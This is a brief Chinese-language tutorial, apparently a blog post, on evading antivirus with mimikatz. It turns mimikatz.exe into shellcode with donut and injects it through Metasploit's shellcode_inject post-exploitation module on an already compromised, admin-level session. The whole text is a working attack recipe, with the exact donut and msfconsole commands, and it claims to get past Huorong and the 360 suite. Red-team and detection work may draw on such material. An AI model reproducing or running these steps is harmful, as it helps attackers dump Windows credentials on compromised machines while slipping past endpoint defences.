minikatz免殺之msf加載bin文件
准備工作
donut 0.9.2版本穩定 https://github.com/TheWover/donut
shellcode_inject.rb kali自帶,目錄/usr/share/metasploit-framework/modules/post/windows/manage/
步驟
1.使用Donut對需要執行的文件進行shellcode生成,這里對mimikatz進行shellcode生成,生成mini.bin文件,放到msf服務器上。留着備用。
donut.exe -f mimikatz.exe -a 2 -o mimi.bin
2.有session會話,管理員權限。
3.調用msf-shellcode_inject注入模塊,
use post/windows/manage/shellcode_inject
session 1
set shellcode
set shellcode /root/test/mini.bin
run
為了可以直接回來會話,設置下面圖片中的false為true,不然無交互式界面。
運行,直接回來minikatz交互式頁面。
過火絨
360全套